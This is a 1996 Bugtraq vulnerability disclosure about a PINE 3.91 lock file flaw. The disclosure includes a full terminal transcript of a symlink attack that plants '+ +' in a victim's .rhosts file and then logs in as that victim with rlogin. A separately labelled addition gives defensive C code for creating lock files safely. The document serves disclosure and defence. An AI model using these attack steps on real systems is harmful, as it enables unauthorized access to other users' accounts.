From proff Tue Aug 27 10:29:48 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id KAA06805 for best-of-security; Tue, 27 Aug 1996 10:29:48 +1000
Received: from brimstone.netspace.org ([128.148.157.143]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id JAA01638 for ; Tue, 27 Aug 1996 09:50:59 +1000
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <23288-23819>; Mon, 26 Aug 1996 19:48:26 -0500
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id TAA27995; Mon, 26 Aug 1996 19:48:36 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 299579 for BUGTRAQ@NETSPACE.ORG; Mon, 26 Aug 1996 19:41:08 -0400
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id TAA27191 for ; Mon, 26 Aug 1996 19:40:45 -0400
Approved-By: ALEPH1@UNDERGROUND.ORG
Received: from litterbox.org (litterbox.org [205.247.190.19]) by netspace.org (8.7/8.6.12) with ESMTP id TAA26531 for ; Mon, 26 Aug 1996 19:36:06 -0400
Received: from localhost (hamors@localhost) by litterbox.org (8.7.5/8.6.9) with SMTP id TAA01869; Mon, 26 Aug 1996 19:35:29 -0400
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Approved-By: "Sean B. Hamor"
Message-ID:
Date: Mon, 26 Aug 1996 19:35:05 -0400
Reply-To: Bugtraq List
Sender: proff
From: "Sean B. Hamor"
Subject: [BUG] Vulnerability in PINE
X-cc: New Hack City Projects , Raven , Bill Arcand , "(d)(M)(v)"
To: Multiple recipients of list BUGTRAQ

-----BEGIN PGP SIGNED MESSAGE-----

Monday, August 26, 1996
The Litterbox
Sean B. Hamor

Note: I'm not sure whether or not this information has been previously released. I found this earlier this evening while poking around, and apologize if I've just found an old bug. I verified the existence of this bug in PINE 3.91; however, it had been fixed in 3.95. I don't know if 3.92, 3.93, or 3.94 are affected.
Even though this bug has been fixed, I thought I'd still release this because many Linux installations still use PINE 3.91, and most machines I have accounts on still use PINE 3.91.

Synopsis:

A problem exists in PINE where the name used for the lockfile in /tmp/ is easily guessable. From various testing on a few machines, the name of the lockfile is static for each user who launches PINE. Note that the lockfile is only created when there is new mail in the user's INBOX. This wouldn't normally be a problem; however, this lockfile is created mode 666 in /tmp/. The static lockfile name can be easily attained by doing an ls in /tmp/ when it has been determined that the user is running PINE and has new email.

Exploit:

By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile. Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts (for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.
For this example, hamors is the victim while catluvr is the attacker:

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr   1739  0.0  1.8   100  356 pp3 S    19:07   0:00 grep pine
hamors    1732  0.8  5.7   249 1104 pp2 S    19:05   0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw-   1 hamors   elite           4 Aug 26 19:05 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr   1744  0.0  1.8   100  356 pp3 S    19:08   0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr   1759  0.0  1.8   100  356 pp3 S    19:11   0:00 grep pine
hamors    1756  2.7  5.1   226  992 pp2 S    19:10   0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

Verification:

This vulnerability has been tested on the following platforms with the following versions of PINE:

Linux Slackware 3.0 (1.2.13): PINE 3.91
FreeBSD 2.1.0-RELEASE: PINE 3.91

Problem has been fixed in PINE 3.95 under Linux Slackware 3.0 (1.2.13):

Log entry:
Aug 26 19:10:58 litterbox syslog: SECURITY PROBLEM: lock file /tmp/.302.f5a4 is a symbolic link

User warning:
[SECURITY ALERT: symbolic link on lock name!]
[Can't open mailbox lock, access is readonly]

EOF

Finger hamors@ishiboo.com          /\_/\     mailto:hamors@litterbox.org
for PGP public key block.         ( o.o )    http://www.ishiboo.com/~hamors/
alt.litterbox, The Home of TOCA    > ^ <     http://www.litterbox.org/~hamors/
Hi! I'm a .signature virus! Add me to your .signature and join in the fun!
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMiI0rjU6HlxZIJ+FAQES9Qf/UYcqT/L9iEVwre6MS0Uokaw7npEqM8iZ
zFZF5KLBGFOSCE36V+2VG2/7rhR24Q4J9A51VyaCC3kzQyS++wr5IqaBl9AGxpIG
zSk2APmUnyi5NmUYoRnRIwFP8ptg15Bz3syxqsLegPYJdZW1r7DeA4rG47xi0lgG
abNNfDta1PQYbxRh+C6yQ9ey6p31/o59CDackH/ene9brqqQXZBrt/fnn4SnNHiP
EQyjcwkyTkFHkCQmfCmT1zJzlVfF6sj36der7boIsu9EAFsqpSwzI1/zZCvFgzoZ
kpH4/srgo3tIFOcTFSoescJQE+wynwMK45Ab0VYjpPAvOBwqld6hyg==
=hejk
-----END PGP SIGNATURE-----
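Added example, not part of the original Bugtraq post and not PINE's own code: the post describes two defects in the 3.91 lock file handling (the file is created mode 666, and creation follows a symbolic link planted at the predictable name), and the 3.95 log entry shows the fix refusing a lock name that is a symlink. The C below shows how a lock file is created so that neither defect applies: open() with O_CREAT|O_EXCL|O_NOFOLLOW and mode 0600, and an lstat() check that reports "symbolic link on lock name" when creation fails. The two demo functions rebuild the report's scenario in a private temporary directory: a dangling symlink named .302.f5a4 (the name from the transcript) pointing at a stand-in for ~hamors/.rhosts. The directory, the stand-in target and the demo function names are constructed for this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Outcome of an attempt to create a lock file. */
enum lock_result {
    LOCK_CREATED = 0,   /* fresh regular file, mode 0600, no symlink followed */
    LOCK_SYMLINK,       /* the lock name is a symbolic link: refuse and warn */
    LOCK_HELD,          /* a regular file already exists: someone holds the lock */
    LOCK_ERROR          /* any other failure */
};

/*
 * Create the lock file safely. O_EXCL makes creation atomic (an existing
 * name, including a dangling symlink, makes open() fail), O_NOFOLLOW
 * refuses to traverse a symlink at the final component, and mode 0600
 * keeps other users from writing the file even when it is created.
 */
enum lock_result create_lock(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd >= 0) {
        char buf[32];
        int n = snprintf(buf, sizeof buf, "%ld\n", (long)getpid());
        if (write(fd, buf, (size_t)n) != n) {
            close(fd);
            unlink(path);
            return LOCK_ERROR;
        }
        close(fd);
        return LOCK_CREATED;
    }
    if (errno == EEXIST || errno == ELOOP) {
        struct stat st;
        if (lstat(path, &st) != 0)
            return LOCK_ERROR;
        /* This is the condition the 3.95 syslog line reports. */
        return S_ISLNK(st.st_mode) ? LOCK_SYMLINK : LOCK_HELD;
    }
    return LOCK_ERROR;
}

/* Constructed scenario: a dangling symlink at the predictable lock name
 * points at a file standing in for ~victim/.rhosts. Returns 1 when the
 * lock is refused and the target was never created. */
int demo_symlink_on_lock_name(void)
{
    char dir[] = "/tmp/lockdemo.XXXXXX";        /* constructed scratch dir */
    if (mkdtemp(dir) == NULL) return 0;
    char lock[256], target[256];
    snprintf(lock, sizeof lock, "%s/.302.f5a4", dir);   /* lock name from the report */
    snprintf(target, sizeof target, "%s/rhosts", dir);  /* stand-in for ~hamors/.rhosts */
    if (symlink(target, lock) != 0) { rmdir(dir); return 0; }

    enum lock_result r = create_lock(lock);
    struct stat st;
    int target_untouched = (lstat(target, &st) != 0 && errno == ENOENT);

    unlink(lock);
    rmdir(dir);
    return r == LOCK_SYMLINK && target_untouched;
}

/* Clean case: no symlink present. Returns 1 when the lock is created as a
 * regular file with mode 0600 and a second attempt sees it as held. */
int demo_clean_lock(void)
{
    char dir[] = "/tmp/lockdemo.XXXXXX";        /* constructed scratch dir */
    if (mkdtemp(dir) == NULL) return 0;
    char lock[256];
    snprintf(lock, sizeof lock, "%s/.302.f5a4", dir);

    enum lock_result r = create_lock(lock);
    struct stat st;
    int ok = (r == LOCK_CREATED && lstat(lock, &st) == 0 &&
              S_ISREG(st.st_mode) && (st.st_mode & 0777) == 0600);
    int second = (create_lock(lock) == LOCK_HELD);  /* must not clobber it */

    unlink(lock);
    rmdir(dir);
    return ok && second;
}

int main(void)
{
    printf("symlink on lock name refused: %s\n", demo_symlink_on_lock_name() ? "yes" : "no");
    printf("clean lock created 0600:      %s\n", demo_clean_lock() ? "yes" : "no");
    return 0;
}
```

The O_EXCL flag is what closes the race the transcript relies on: without it, a check followed by a separate create leaves a window in which the symlink can be planted between the two calls. Mode 0600 addresses the second half of the report independently, so that even a lock file that does get created cannot be written by another user.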